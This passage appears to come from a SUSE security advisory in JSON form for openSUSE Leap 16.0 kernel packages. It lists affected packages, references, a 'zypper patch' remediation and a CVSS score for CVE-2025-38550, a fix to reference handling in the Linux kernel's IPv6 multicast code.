"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38548"
},
{
"cve": "CVE-2025-38550",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38550"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: mcast: Delay put pmc-\u003eidev in mld_del_delrec()\n\npmc-\u003eidev is still used in ip6_mc_clear_src(), so as mld_clear_delrec()\ndoes, the reference should be put after ip6_mc_clear_src() return.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38550",
"url": "https://www.suse.com/security/cve/CVE-2025-38550"
},
{
"category": "external",
"summary": "SUSE Bug 1248227 for CVE-2025-38550",
"url": "https://bugzilla.suse.com/1248227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
